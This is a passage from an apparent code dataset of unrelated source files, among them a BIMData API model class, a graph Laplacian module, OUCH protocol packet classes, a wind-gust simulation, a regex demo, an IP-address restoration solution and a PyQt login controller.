findx(x, x_test):\n '''Find the grid value just below x_test in a sequence.'''\n for xi in x:\n if xi <= x_test <= x[x.index(xi) + 1]:\n return xi\n\n\n## REMEMBER THAT THIS FILE (WHEN YOU SUBMIT IT) MUST NOT CONTAIN ANYTHING\n## OTHER THAN YOUR FUNCTION DEFINITION AND COMMENTS. You can (and should)\n## use docstrings to document your functions, but a docstring should only\n## be used inside a function definition, and then only at the very beginning\n## of the function suite. 
Everywhere else you should use comments.\n","sub_path":"homeworks/homework5/homework5.py","file_name":"homework5.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"269167309","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n \nclass creatTree: # create a binary tree from a preorder list (None marks a missing child)\n def __init__(self, arr):\n self.arr = arr\n self.root = None\n self.creatXian(0,None)\n def creatXian(self, k, Node):\n if k == 0:\n self.root = TreeNode(self.arr[k])\n self.creatXian(k+1,self.root)\n else:\n #Node.left\n if self.arr[k] is None:\n Node.left = None\n #Node.right\n if self.arr[k+1] is None:\n Node.right = None\n return k+1\n else:\n Node.right = TreeNode(self.arr[k+1])\n n = self.creatXian(k+2,Node.right)\n return n\n else:\n Node.left = TreeNode(self.arr[k])\n n = self.creatXian(k+1,Node.left)\n\n #Node.right\n if self.arr[n+1] is None:\n Node.right = None\n return n+1\n else:\n Node.right = TreeNode(self.arr[n+1])\n n = self.creatXian(n+2,Node.right)\n return n\n\na = creatTree([3,9,None,None,20,15,None,None,7,None,None])\nb = creatTree([3,2,1,None,None,None,4,None,None])\n'''\nclass Solution:#28ms 18.4MB\n def __init__(self, root, nums):\n self.root = root\n self.nums = nums\n self.load = []\n if self.root is not None:\n self.pathSum(self.root,[])\n\n def pathSum(self,node,arr):\n if node.left is None and node.right is None:\n if sum(arr)+node.val == self.nums:\n self.load.append(arr+[node.val])\n return\n if node.left is not None:\n self.pathSum(node.left, arr+[node.val])\n if node.right is not None:\n self.pathSum(node.right, arr+[node.val])\n'''\nclass Solution:#28ms 14.6MB\n def __init__(self, root, nums):\n self.root = root\n self.nums = nums\n self.load = []\n if self.root is not None:\n stack = [[self.root,[self.root.val]]]\n while stack:\n temp = stack.pop()\n #print(temp)\n if temp[0].left is None and temp[0].right is None:\n if sum(temp[1]) == self.nums:\n self.load.append(temp[1])\n if temp[0].left is not None:\n stack.append([temp[0].left, temp[1]+ [temp[0].left.val] ])\n if temp[0].right is not None:\n stack.append([temp[0].right, temp[1]+ [temp[0].right.val] ])\n print(self.load)\n","sub_path":"code/路径总和2.py","file_name":"路径总和2.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"197942643","text":"import csv\n\n\ndef print_schools(reader):\n schools = []\n for line in reader:\n for team in [4, 7]:\n if line[team] not in schools:\n schools.append(line[team])\n schools.sort()\n for school in schools:\n print(school)\n\n\ndef print_tournaments(reader):\n tournaments = []\n for line in reader:\n if line[1] not in tournaments:\n tournaments.append(line[1])\n tournaments.sort()\n for tournament in tournaments:\n print(tournament)\n\n\ndef main():\n rounds = open('rounds-completed.csv')\n reader = csv.reader(rounds)\n print_schools(reader)\n rounds.seek(0) # rewind: the first pass exhausted the file, so the reader would otherwise yield nothing\n print_tournaments(reader)\n rounds.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cleaning/cleaning_tools.py","file_name":"cleaning_tools.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"343374466","text":"# coding: utf-8\n\n\"\"\"\n BIMData API\n\n BIMData API is a tool to interact with your models stored on BIMData’s servers. 
Through the API, you can manage your projects, the clouds, upload your IFC files and manage them through endpoints. # noqa: E501\n\n The version of the OpenAPI document: v1\n Contact: support@bimdata.io\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom bimdata_api_client.configuration import Configuration\n\n\nclass Invitation(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'id': 'int',\n 'client_id': 'str',\n 'redirect_uri': 'str',\n 'cloud_name': 'str',\n 'cloud_role': 'int',\n 'project_name': 'str',\n 'project_role': 'int',\n 'email': 'str',\n 'status': 'str',\n 'sender_provider_sub': 'str'\n }\n\n attribute_map = {\n 'id': 'id',\n 'client_id': 'client_id',\n 'redirect_uri': 'redirect_uri',\n 'cloud_name': 'cloud_name',\n 'cloud_role': 'cloud_role',\n 'project_name': 'project_name',\n 'project_role': 'project_role',\n 'email': 'email',\n 'status': 'status',\n 'sender_provider_sub': 'sender_provider_sub'\n }\n\n def __init__(self, id=None, client_id=None, redirect_uri=None, cloud_name=None, cloud_role=None, project_name=None, project_role=None, email=None, status=None, sender_provider_sub=None, local_vars_configuration=None): # noqa: E501\n \"\"\"Invitation - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._id = None\n self._client_id = None\n self._redirect_uri = None\n self._cloud_name = None\n self._cloud_role = None\n self._project_name = None\n self._project_role = None\n self._email = None\n self._status = None\n self._sender_provider_sub = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n if client_id is not None:\n self.client_id = client_id\n self.redirect_uri = redirect_uri\n self.cloud_name = cloud_name\n self.cloud_role = cloud_role\n if project_name is not None:\n self.project_name = project_name\n self.project_role = project_role\n self.email = email\n if status is not None:\n self.status = status\n if sender_provider_sub is not None:\n self.sender_provider_sub = sender_provider_sub\n\n @property\n def id(self):\n \"\"\"Gets the id of this Invitation. # noqa: E501\n\n\n :return: The id of this Invitation. # noqa: E501\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this Invitation.\n\n\n :param id: The id of this Invitation. # noqa: E501\n :type: int\n \"\"\"\n\n self._id = id\n\n @property\n def client_id(self):\n \"\"\"Gets the client_id of this Invitation. # noqa: E501\n\n\n :return: The client_id of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._client_id\n\n @client_id.setter\n def client_id(self, client_id):\n \"\"\"Sets the client_id of this Invitation.\n\n\n :param client_id: The client_id of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n\n self._client_id = client_id\n\n @property\n def redirect_uri(self):\n \"\"\"Gets the redirect_uri of this Invitation. # noqa: E501\n\n User will be redirected to this uri when they accept the invitation # noqa: E501\n\n :return: The redirect_uri of this Invitation. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._redirect_uri\n\n @redirect_uri.setter\n def redirect_uri(self, redirect_uri):\n \"\"\"Sets the redirect_uri of this Invitation.\n\n User will be redirected to this uri when they accept the invitation # noqa: E501\n\n :param redirect_uri: The redirect_uri of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and redirect_uri is None: # noqa: E501\n raise ValueError(\"Invalid value for `redirect_uri`, must not be `None`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n redirect_uri is not None and len(redirect_uri) > 512):\n raise ValueError(\"Invalid value for `redirect_uri`, length must be less than or equal to `512`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n redirect_uri is not None and len(redirect_uri) < 1):\n raise ValueError(\"Invalid value for `redirect_uri`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._redirect_uri = redirect_uri\n\n @property\n def cloud_name(self):\n \"\"\"Gets the cloud_name of this Invitation. # noqa: E501\n\n\n :return: The cloud_name of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._cloud_name\n\n @cloud_name.setter\n def cloud_name(self, cloud_name):\n \"\"\"Sets the cloud_name of this Invitation.\n\n\n :param cloud_name: The cloud_name of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and cloud_name is None: # noqa: E501\n raise ValueError(\"Invalid value for `cloud_name`, must not be `None`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n cloud_name is not None and len(cloud_name) < 1):\n raise ValueError(\"Invalid value for `cloud_name`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._cloud_name = cloud_name\n\n @property\n def cloud_role(self):\n \"\"\"Gets the cloud_role of this Invitation. # noqa: E501\n\n Role the user will have when they accept the invitation # noqa: E501\n\n :return: The cloud_role of this Invitation. # noqa: E501\n :rtype: int\n \"\"\"\n return self._cloud_role\n\n @cloud_role.setter\n def cloud_role(self, cloud_role):\n \"\"\"Sets the cloud_role of this Invitation.\n\n Role the user will have when they accept the invitation # noqa: E501\n\n :param cloud_role: The cloud_role of this Invitation. # noqa: E501\n :type: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and cloud_role is None: # noqa: E501\n raise ValueError(\"Invalid value for `cloud_role`, must not be `None`\") # noqa: E501\n\n self._cloud_role = cloud_role\n\n @property\n def project_name(self):\n \"\"\"Gets the project_name of this Invitation. # noqa: E501\n\n\n :return: The project_name of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._project_name\n\n @project_name.setter\n def project_name(self, project_name):\n \"\"\"Sets the project_name of this Invitation.\n\n\n :param project_name: The project_name of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n project_name is not None and len(project_name) < 1):\n raise ValueError(\"Invalid value for `project_name`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._project_name = project_name\n\n @property\n def project_role(self):\n \"\"\"Gets the project_role of this Invitation. 
# noqa: E501\n\n Role the user will have when they accept the invitation # noqa: E501\n\n :return: The project_role of this Invitation. # noqa: E501\n :rtype: int\n \"\"\"\n return self._project_role\n\n @project_role.setter\n def project_role(self, project_role):\n \"\"\"Sets the project_role of this Invitation.\n\n Role the user will have when they accept the invitation # noqa: E501\n\n :param project_role: The project_role of this Invitation. # noqa: E501\n :type: int\n \"\"\"\n\n self._project_role = project_role\n\n @property\n def email(self):\n \"\"\"Gets the email of this Invitation. # noqa: E501\n\n email of the user to invite # noqa: E501\n\n :return: The email of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._email\n\n @email.setter\n def email(self, email):\n \"\"\"Sets the email of this Invitation.\n\n email of the user to invite # noqa: E501\n\n :param email: The email of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and email is None: # noqa: E501\n raise ValueError(\"Invalid value for `email`, must not be `None`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n email is not None and len(email) > 256):\n raise ValueError(\"Invalid value for `email`, length must be less than or equal to `256`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n email is not None and len(email) < 1):\n raise ValueError(\"Invalid value for `email`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._email = email\n\n @property\n def status(self):\n \"\"\"Gets the status of this Invitation. # noqa: E501\n\n A: Accepted D: Denied P: Pending # noqa: E501\n\n :return: The status of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this Invitation.\n\n A: Accepted D: Denied P: Pending # noqa: E501\n\n :param status: The status of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"A\", \"D\", \"P\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and status not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `status` ({0}), must be one of {1}\" # noqa: E501\n .format(status, allowed_values)\n )\n\n self._status = status\n\n @property\n def sender_provider_sub(self):\n \"\"\"Gets the sender_provider_sub of this Invitation. # noqa: E501\n\n OIDC sub of the sender. The original sub from the provider is used instead of the broker sub # noqa: E501\n\n :return: The sender_provider_sub of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._sender_provider_sub\n\n @sender_provider_sub.setter\n def sender_provider_sub(self, sender_provider_sub):\n \"\"\"Sets the sender_provider_sub of this Invitation.\n\n OIDC sub of the sender. The original sub from the provider is used instead of the broker sub # noqa: E501\n\n :param sender_provider_sub: The sender_provider_sub of this Invitation. 
# noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n sender_provider_sub is not None and len(sender_provider_sub) < 1):\n raise ValueError(\"Invalid value for `sender_provider_sub`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._sender_provider_sub = sender_provider_sub\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Invitation):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, Invitation):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"bimdata_api_client/models/invitation.py","file_name":"invitation.py","file_ext":"py","file_size_in_byte":13317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221962147","text":"'''\nModule to calculate local distance matrix and weighted graph Laplacian\n\n'''\nimport numpy as np\nimport cv2\nfrom scipy.spatial.distance import pdist, squareform\nfrom numpy.matlib import repmat\nimport timeit\ndef local_dist_mat(x,k,metric='euclidean',grounddist=0,iteration=0):\n# local_dist_mat: Calculates the knn - local distance matrix based on parameter k\n\n n_samples,n_dim = x.shape\n ixx = np.linspace(0,n_samples-1,n_samples,dtype=int)\n ixx = repmat(ixx,k,1)\n \n # check wich metric to be calculated\n if metric == 'emd':\n x = np.float32(x)\n grounddist = np.float32(grounddist)\n n_pdist = int(n_samples*(n_samples-1)/2) \n dist_vect = np.empty((n_pdist))\n idx = 0\n for j in range(n_samples-1):\n start = j+1\n for i in range(start,n_samples):\n print('Now calculating {} of {} at iteration {}'.format(idx+1,n_pdist,iteration+1))\n start = timeit.timeit()\n dist_vect[idx],_,_ = cv2.EMD(np.transpose(x[i,:]),np.transpose(x[j,:]),cv2.DIST_USER,cost=grounddist)\n end = timeit.timeit()\n print('time elaplsed: ', end-start)\n idx = idx+1\n else:\n dist_vect = pdist(x,metric)\n \n dist_mat = squareform(dist_vect) \n \n # calculate local dist matrix \n knn_mat = np.argsort(dist_mat,axis=0) \n knn_mat = knn_mat[1:k+1,:] # only first k elements (without the zeros)\n knn_dist_mat = np.zeros((k,n_samples))\n for j in range(n_samples):\n for i in range(k):\n idx_row = knn_mat[i,j]\n idx_col = j\n knn_dist_mat[i,j] = dist_mat[idx_row,idx_col]\n\n dist_mat_local = np.zeros((n_samples,n_samples))\n for j in range(n_samples):\n for i in range(k):\n idx_row = knn_mat[i,j]\n idx_col = ixx[i,j]\n dist_mat_local[idx_row,idx_col] = knn_dist_mat[i,j]\n\n dist_mat_local = np.maximum(dist_mat_local,np.transpose(dist_mat_local)) # symmetrize\n\n return dist_mat_local\n\n\n\ndef 
weighted_graph_laplacian(dist_mat):\n# local_graph_laplacian: Calculates the weighted graph laplacian of a distance matrix\n n = dist_mat.shape[0]\n d = np.sum(dist_mat,axis=1) # sum up rows (-->)\n if len(d[d==0]) > 0:\n i_zeros = np.where(d==0)\n d[i_zeros] = 1\n D = np.diag(1/d) # Degree Matrix\n A = 1/n * np.matmul(np.matmul(D,dist_mat),D) # weighted Adjacency matrix\n d = np.sum(A,axis=1) # sum up rows (-->)\n if len(d[d==0]) > 0:\n i_zeros = np.where(d==0)\n d[i_zeros] = 1/n\n D = np.diag(d) # Degree Matrix of weighted A\n\n L = D-A # Graph Laplacian\n\n return L","sub_path":"Anomaly_Detection_Py/Diffusion_Fct.py","file_name":"Diffusion_Fct.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"477247732","text":"#!/usr/bin/python3\n\"\"\"Base Model\"\"\"\n\nimport json\nimport models\nimport uuid\nfrom datetime import datetime\n\ncronos = '%Y-%m-%dT%H:%M:%S.%f'\n\n\nclass BaseModel:\n \"\"\"BaseModel for other classes\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"public instance attr\"\"\"\n if kwargs:\n self.__dict__ = kwargs\n if \"created_at\" in kwargs:\n self.created_at = datetime.strptime(kwargs.get(\"created_at\"),\n cronos)\n if \"updated_at\" in kwargs:\n self.updated_at = datetime.strptime(kwargs.get(\"updated_at\"),\n cronos)\n else:\n self.id = str(uuid.uuid4())\n self.created_at = datetime.now()\n models.storage.new(self)\n\n def __str__(self):\n \"\"\"String rep of the BaseModel\"\"\"\n return \"[{:s}] ({:s}) {}\".format(self.__class__.__name__,\n self.id, self.__dict__)\n\n def save(self):\n \"\"\"updates the attr updated_at\"\"\"\n self.updated_at = datetime.now()\n models.storage.save()\n\n def to_dict(self):\n \"\"\"returns a dictionary with created_at and updated_at\"\"\"\n s_dict = self.__dict__.copy()\n s_dict[\"__class__\"] = type(self).__name__\n for key, value in s_dict.items():\n if isinstance(value, datetime):\n s_dict[key] = value.strftime(cronos)\n return s_dict\n","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"151844476","text":"import dpkt\n\n\n#Upstream messages\nACCEPTED='A'\nCANCELED='C'\nEXECUTED='E'\n\n#Downstream messages\nENTER_ORDER='O'\nCANCEL_ORDER='X'\n\n\nclass EnterOrder(dpkt.Packet):\n \"\"\"OUCH Enter order message\"\"\"\n __hdr__ = (('ordertoken', '14s', ''),\n ('side', 'c', 0),\n ('shares', 'I', 0),\n ('stock', '8s', ''),\n ('price', 'I', 0),\n ('tif', 'I', 0),\n ('firm', '4s', 0),\n ('display', 'c', 0),\n ('capacity', 'c', 0),\n ('iso', 'c', 0),\n ('minqty', 'I', 0),\n ('crosstype', 'c', 0),\n ('customertype', 'c', 0))\n\n\nclass CancelOrder(dpkt.Packet):\n \"\"\"OUCH Cancel order message\"\"\"\n __hdr__ = (('ordertoken', '14s', ''),\n ('shares', 'I', 0))\n\n\nclass Accepted(dpkt.Packet):\n \"\"\"OUCH Accepted message\"\"\"\n __hdr__ = (('timestamp', 'Q', 0),\n ('ordertoken', '14s', ''),\n ('side', 'c', 0),\n ('shares', 'I', 0),\n ('stock', '8s', ''),\n ('price', 'I', 0),\n ('tif', 'I', 0),\n ('firm', '4s', 0),\n ('display', 'c', 0),\n ('orderrefnum', 'Q', 0),\n ('capacity', 'c', 0),\n ('iso', 'c', 0),\n ('minqty', 'I', 0),\n ('crosstype', 'c', 0),\n ('orderstate', 'c', 0),\n ('bboweightind', 'c', 0))\n\n \nclass Canceled(dpkt.Packet):\n \"\"\"OUCH Canceled message\"\"\"\n __hdr__ = (('timestamp', 'Q', 0),\n ('ordertoken', '14s', ''),\n ('decshares', 'I', 0),\n ('reason', 
'c', 0))\n\n\nclass Executed(dpkt.Packet):\n \"\"\"OUCH Executed message\"\"\"\n __hdr__ = (('timestamp', 'Q', 0),\n ('ordertoken', '14s', ''),\n ('execshares', 'I', 0),\n ('execprice', 'I', 0),\n ('liquidityflag', 'c', 0),\n ('matchnumber', 'Q', 0))\n","sub_path":"ouch42.py","file_name":"ouch42.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"523398184","text":"import re\n\n# any character\ns = 'Почта разработчиков develop@mail.ru, а почта поддержки support@ya.ru.'\n\nr = re.search(r'\\w+@[A-z0-9-]+\\.[A-z0-9-]+', s)\nprint(r.group())\n\nf = re.findall(r'\\w+@[A-z0-9-]+\\.[A-z0-9-]+', s)\nprint(f)\n\n# Extract only the mailbox user name\nr = re.search(r'(\\w+)@([A-z0-9-]+\\.[A-z0-9-]+)', s)\nprint(r.group(1))\n\nr = re.findall(r'(\\w+)@([A-z0-9-]+\\.[A-z0-9-]+)', s)\nprint(r)\n\n# Substitution with a regular expression\nr = re.sub(r'(\\w+)@([A-z0-9-]+\\.[A-z0-9-]+)', r'xxx@\\2', s)\nprint(r)\n\nf = 'y = -1x + 2'\nr = re.findall(r'y\\s*=\\s*([\\d+-]+)x\\s*([+-])\\s*([\\d])', f)\n\nprint(r)","sub_path":"re_libruary.py","file_name":"re_libruary.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"173956743","text":"\"\"\"\nClass to determine wind velocity at any given moment,\ncalculates a steady wind speed and uses a stochastic\nprocess to represent wind gusts. (Follows section 4.4 in uav book)\n\"\"\"\nimport sys\nsys.path.append('..')\nfrom tools.transfer_function import transferFunction\nfrom tools.rotations import Euler2Rotation2\nimport parameters.aerosonde_parameters as MAV\n#import parameters.simulation_parameters as SIM\nfrom math import sqrt\nimport numpy as np\n\n\nclass windSimulation:\n def __init__(self, Ts):\n # steady state wind defined in the inertial frame\n self._steady_state = np.array([[0., 0., 0.]]).T\n # Gust model parameters from table 4.1\n L_u = 200\n L_v = 200\n L_w = 50\n sigma_u = 1.06\n sigma_v = 1.06\n sigma_w = 0.7\n Va0 = MAV.Va0 # Reference value for airspeed\n # Dryden gust transfer functions: a scalar gain multiplies the numerator and denominator coefficient arrays\n self.u_w_g = transferFunction(sigma_u * sqrt(2 * Va0 / L_u) * np.array([[1]]), sigma_u * sqrt(2 * Va0 / L_u) * np.array([[1, Va0 / L_u]]), Ts)\n self.v_w_g = transferFunction(sigma_v * sqrt(3 * Va0 / L_v) * np.array([[1, Va0 / (sqrt(3) * L_v)]]), sigma_v * sqrt(3 * Va0 / L_v) * np.array([[1, 2 * Va0 / L_v, (Va0 / L_v)**2]]), Ts)\n self.w_w_g = transferFunction(sigma_w * sqrt(3 * Va0 / L_w) * np.array([[1, Va0 / (sqrt(3) * L_w)]]), sigma_w * sqrt(3 * Va0 / L_w) * np.array([[1, 2 * Va0 / L_w, (Va0 / L_w)**2]]), Ts)\n self._Ts = Ts\n\n def update(self):\n # returns a six vector.\n # The first three elements are the steady state wind in the inertial frame\n # The second three elements are the gust in the body frame\n gust = np.array([[self.u_w_g.update(np.random.randn())],\n [self.v_w_g.update(np.random.randn())],\n [self.w_w_g.update(np.random.randn())]])\n #gust = np.array([[0.],[0.],[0.]])\n return np.concatenate((self._steady_state, gust))\n","sub_path":"simulation_py/dynamics/wind_simulation.py","file_name":"wind_simulation.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"147396801","text":"import uuid\nfrom models.database import Database\nfrom models.post import Post\n\nclass Blog(object):\n def __init__(self,author,title,description,id=None):\n self.id = uuid.uuid4().hex if id is None else id\n self.author = 
author\n self.title = title\n self.description = description\n\n def new_post(self):\n title = input(\"What is the title of your post? \")\n body = input(\"Body: \")\n post = Post(blog_id=self.id,title=title,body=body,author=self.author)\n post.save_to_mongo()\n\n def get_posts(self):\n return Post.get_from_blog(self.id)\n \n def save_to_mongo(self):\n Database.insert(collection='blogs', data=self.json())\n\n def json(self):\n return {\n 'author':self.author,\n 'title':self.title,\n 'description':self.description,\n 'id':self.id\n }\n \n @classmethod\n def get_from_mongo(cls,id):\n blog_data = Database.find_one(collection=\"blogs\",query={\"id\":id})\n print(blog_data[\"id\"])\n return cls(author=blog_data[\"author\"],title=blog_data[\"title\"],description=blog_data[\"description\"],id=blog_data[\"id\"])\n","sub_path":"blog_app/models/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"463508607","text":"import sys\nsys.path.append('/home/danielle8farias/hello-world-python3/meus_modulos')\nfrom mensagem import ler_cabecalho\n\nfrom matrizes.ordem_matriz import linha_coluna\nfrom matrizes.construcao_matriz import construir_matriz\nfrom matrizes.impressao_matriz import imprimir_matriz\n\nfrom time import sleep\n\n\n# element-wise sum of two matrices\ndef efetuar_soma_matrizes (A, B):\n num_linhas = len(A)\n num_colunas = len(A[0]) # the length of any one row of A is enough\n soma = []\n for i in range(num_linhas):\n linha = []\n for j in range(num_colunas):\n valor_soma = (A[i][j] + B[i][j])\n linha.append(valor_soma)\n soma.append(linha)\n return soma\n\n\n# main entry point for matrix addition\ndef somar_matrizes():\n ler_cabecalho('soma duas matrizes')\n # read the order of the matrices\n print('Matriz A')\n Ai, Aj = linha_coluna()\n print()\n print('Matriz B')\n Bi, Bj = linha_coluna()\n print()\n # check that both matrices have the same order\n if Ai == Bi and Aj == Bj:\n # build the matrices\n print('Construindo matriz A')\n A = construir_matriz(Ai, Aj)\n print('\\nConstruindo matriz B')\n B = construir_matriz(Bi, Bj)\n print()\n # print the matrices\n sleep(0.5)\n print('Matriz A:')\n imprimir_matriz(A, Ai, Aj)\n print()\n sleep(0.5)\n print('Matriz B:')\n imprimir_matriz(B, Bi, Bj)\n print()\n resultado = efetuar_soma_matrizes(A, B)\n # print the sum\n sleep(0.5)\n print('\\nResultado da soma:')\n imprimir_matriz(resultado, Ai, Aj)\n else:\n print('Não é possível somar: As matrizes devem ser de mesma ordem.')\n sleep(0.5)\n print()\n","sub_path":"calculadora_py/matrizes/soma_matriz.py","file_name":"soma_matriz.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"570522227","text":"from __future__ import annotations\nimport collections\nimport random\nimport heapq\nfrom tracemalloc import start\n\n\"\"\"\nSuccess\nDetails \nRuntime: 70 ms, faster than 26.70% of Python3 online submissions for Restore IP Addresses.\nMemory Usage: 13.9 MB, less than 82.80% of Python3 online submissions for Restore IP Addresses.\n\"\"\"\nclass Solution:\n def restoreIpAddresses(self, s: str) -> List[str]:\n n = len(s)\n ret = []\n def rec(start_i, curr_ip):\n if len(curr_ip) == 4:\n # index valid?\n if start_i == n:\n ret.append('.'.join(curr_ip))\n return\n # branching\n min_len = 4 - len(curr_ip)\n max_len = min_len * 3\n if n - start_i < min_len:\n return\n if n - start_i > 
max_len:\n return\n # backtrack: try taking 1, 2 or 3 digits as the next octet\n if start_i + 1 <= n and self.is_valid(s[start_i]):\n rec(start_i+1, curr_ip+[s[start_i]])\n if start_i + 2 <= n and self.is_valid(s[start_i:start_i+2]):\n rec(start_i+2, curr_ip+[s[start_i:start_i+2]])\n if start_i + 3 <= n and self.is_valid(s[start_i:start_i+3]):\n rec(start_i+3, curr_ip+[s[start_i:start_i+3]])\n rec(0, [])\n return ret\n def is_valid(self, i):\n # a 1- to 3-digit segment is valid iff it has no leading zero and its value is at most 255\n return len(i) == 1 or (i[0] != '0' and int(i) <= 255)\n\nsol = Solution()\nfor i in range(256):\n assert sol.is_valid(str(i)), i\n\nassert not sol.is_valid('256')\nassert not sol.is_valid('01')\nassert not sol.is_valid('001')\nassert not sol.is_valid('300')\n\nprint(sol.restoreIpAddresses('1111'))\n\n# dfs solve\n","sub_path":"M_93_restoreIpAddresses.py","file_name":"M_93_restoreIpAddresses.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"10464791","text":"import sys\r\nfrom PyQt5 import QtWidgets,QtCore,uic,QtGui\r\nfrom PyQt5.QtWidgets import QWidget,QLabel\r\nfrom PyQt5.QtGui import QMovie\r\nfrom PyQt5.QtCore import QCoreApplication,pyqtSignal, pyqtSlot,Qt,QTimer\r\nfrom PyQt5.uic import loadUi\r\nfrom register import *\r\nfrom main import MainWindow\r\nfrom login import *\r\nfrom icecream import install\r\ninstall()\r\nclass LoadingScreen(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.setFixedSize(400,300)\r\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\r\n self.label_animation=QLabel(self)\r\n self.movie=QMovie(\"images/loading.gif\")\r\n self.label_animation.setMovie(self.movie)\r\n timer=QTimer(self)\r\n timer.singleShot(3000,self.stopAnimation)\r\n self.startAnimation()\r\n def startAnimation(self):\r\n self.movie.start()\r\n self.show()\r\n def stopAnimation(self):\r\n self.movie.stop()\r\n self.close()\r\nclass Controller():\r\n finished=pyqtSignal()\r\n def __init__(self, *arg, **kwargs):\r\n super().__init__(*arg,**kwargs)\r\n self.window=Start(windowTitle='Choose')\r\n def show_start(self):\r\n self.window.rw.connect(self.show_register)\r\n self.window.mw.connect(self.show_main)\r\n self.window.show()\r\n def show_register(self):\r\n self.reg = Register()\r\n self.reg.sw.connect(self.start2)\r\n self.window.close()\r\n self.reg.show()\r\n def show_main(self,str):\r\n self.window.close()\r\n self.main=MainWindow(str)\r\n self.main.lw.connect(self.signout)\r\n 